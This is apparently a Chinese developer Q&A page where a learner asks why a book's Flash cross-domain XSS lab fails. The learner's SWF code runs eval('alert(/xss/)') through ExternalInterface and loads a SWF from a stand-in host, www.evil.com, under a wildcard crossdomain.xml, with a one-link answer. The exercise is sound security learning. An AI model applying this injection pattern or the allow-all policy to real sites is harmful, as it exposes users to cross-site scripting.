Flash跨域问题请教标题要长长长

小弟在做书上的一个实验
1.先在host文件中建立对应关系:127.0.0.1对应着www.foo.com与www.evil.com
2.再依次编写URL.swf,与Hello.swf代码如下
URL.swf

 ExternalInterface.call("eval","alert(/xss/)");
             var loader1:Loader=new Loader();
             loader1.load(new URLRequest("http://www.evil.com/Hello.swf"));

Hello.swf

 ExternalInterface.call("eval","alert(/Helloworld/)");

同时部署策略文件crossdomain.xml于www根目录如下

 <?xml version="1.0"?>
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>

可当我访问http://www.foo.com/URL.swf时并没有弹出helloworld
在firefox下F12打开网络监控如下
图片说明
想请教一下各位大神，为何没有执行
PS:能够访问http://www.evil.com/Hello.swf

写回答
好问题 0 提建议
追加酬金
关注问题
分享
邀请回答
编辑收藏删除结题
收藏举报

1条回答默认最新

关注

码龄粉丝数原力等级 --

被采纳

被点赞

采纳率
devmiao 2015-08-23 15:45
关注
http://blog.csdn.net/vince6799/article/details/4586312

解决无用
评论打赏
分享
举报

评论

按下Enter换行，Ctrl+Enter发表内容

报告相同问题？

关注问题

Jquery编程中遇到了CORS跨域问题 ajax javascript jquery
2023-03-14 11:09

回答 2 已采纳后端接口设置一下跨域
前端XMLHttpRequest跨域问题 c# javascript 有问必答
2021-08-24 23:55

回答 4 已采纳测试你这个接口已经添加了access-control-allow-origin: *响应头可以正常上传，如下图所示调试工具修改问答dom元素添加file，onchange自动上传已经成功 acces
selenium跨域请求问题 javascript python selenium 有问必答
2022-06-10 16:49

回答 3 已采纳添加那个选项后可以跨域的，题主怎么用的，示例代码如下需要注意获取返回值要return TB(url) from selenium import webdriver import time opt =
JavaScript笔记
2022-03-13 17:21

WhyNotZero_的博客与 C 和其他编程语言不同的是， JavaScript 并没有一个标准来统一其语法或特性，而这 3 种不同的版本恰恰突出了这个问题。随着业界担心的增加，这个语言标准化显然已经势在必行。灵敏的微软、迟钝的网景虽然网景...
如何解决下载后台图片时跨域问题 vue.js websocket 前端
2022-03-11 15:16

回答 2 已采纳没有配置 proxy吗？下载地址也用上 proxy的配置
uniapp使用uni.uploadFile上传图片存在跨域问题 javascript 前端前端框架
2022-12-28 11:19

回答 4 已采纳 跨域问题是指浏览器会对发送的请求加上限制，不允许跨域访问。对于 uni.uploadFile 请求，跨域问题可以在前端或者服务器端解决。前端解决方法：在 uni.uploadFile 中添加 h
如何在后端解决跨域问题（java） http java
2021-09-02 11:09

回答 2 已采纳跨域访问，使用远程调用RestTemplate
无ajax,ajax实现无
2021-08-06 11:22

小诗璇的博客我希望能够实现修改jquery源码，来判断这个返回值，如果不是无权限的问题，在调用页面中的手写代码，就像切面编程一样还有一个问题过滤器中如何判断前台是用ajax提交的还是利用其他方式提交的 a123456678 2019-12-01...
关于#跨域#的问题，如何解决？ javascript vue.js 开发语言
2022-11-01 10:50

回答 1 已采纳后端没配置，前端咋搞也白扯
axios请求，带header参数跨域问题 http vue.js 前端
2022-01-08 15:20

回答 4 已采纳用postman或者apipost请求是什么结果
jquery ajax nginx 解决跨域问题 ajax jquery nginx
2022-07-11 20:56

回答 1 已采纳 if ($request_method = 'POST') {add_header 'Access-Control-Allow-Origin' '*或者是你允许的域名';add_header 'Acc
高负载高并发网站架构分析
2017-08-28 14:35

Steven_ssm的博客  大型数据库的设计与编程技巧本人最近开发一个访问统计系统，日志非常的大，都保存在数据库里面。我现在按照常规的设计方法对表进行设计，已经出现了查询非常缓慢地情形。大家对于这种情况如何来设计数据库呢？...
shiro+jwt 跨域问题 java java-ee spring
2021-07-06 21:04

回答 6 已采纳你可以这样试试看 @Configuration public class GlobalCorsConfig { /** * 允许跨域调用的过滤器 */ @Bean
web前端--面试题
2016-03-18 13:49

it-小瑞的博客此外还可以将visibility设为hidden，透明度设为0，或长、宽设为0。 2. 一个定宽网页在浏览器（IE6，IE7，Firefox，IE5）中横向居中对齐的布局，请写出主要的HTML标签及CSS。 http://www.w3.org/TR/xhtml1/DTD
React 入门实例教程
2016-08-02 13:49

红豆和绿豆的博客有的教程讨论一些细节问题，对入门没帮助；有的教程写得不错，但比较短，无助于看清全貌。我断断续续学了几个月，看过二十几篇教程，在这个过程中，将对自己有帮助的 Demo 都收集下来，做成了一个库 React Demos...
没有解决我的问题, 去提问

悬赏问题

¥30 这是哪个作者做的宝宝起名网站
¥60 版本过低apk如何修改可以兼容新的安卓系统
¥25 由IPR导致的DRIVER_POWER_STATE_FAILURE蓝屏
¥50 有数据，怎么建立模型求影响全要素生产率的因素
¥50 有数据，怎么用matlab求全要素生产率
¥15 TI的insta-spin例程
¥15 完成下列问题完成下列问题
¥15 C#算法问题, 不知道怎么处理这个数据的转换
¥15 YoloV5 第三方库的版本对照问题
¥15 请完成下列相关问题！

Flash跨域问题请教标题要长长长

1条回答 默认 最新

悬赏问题

1条回答默认最新